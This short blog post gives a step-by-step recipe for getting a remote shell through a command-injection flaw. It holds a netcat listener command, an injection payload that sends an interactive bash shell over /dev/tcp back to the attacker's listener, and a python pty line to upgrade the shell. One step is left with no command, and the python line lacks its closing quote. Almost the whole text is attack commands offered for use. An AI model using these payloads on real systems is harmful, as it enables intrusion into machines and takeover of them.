To create a shell on a machine vulnerable to command injection

Setup a listener on Kali using Netcat

nc -nlvp 4444


Use the following to connect back to the listener from the target:

; bash -i>&/dev/tcp/LOCALIP/4444 0>&1


Use the following to find out your user and privileges:



To create a more interactive shell from the netcat shell try:

python -c 'import pty;pty.spawn("/bin/sh")


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s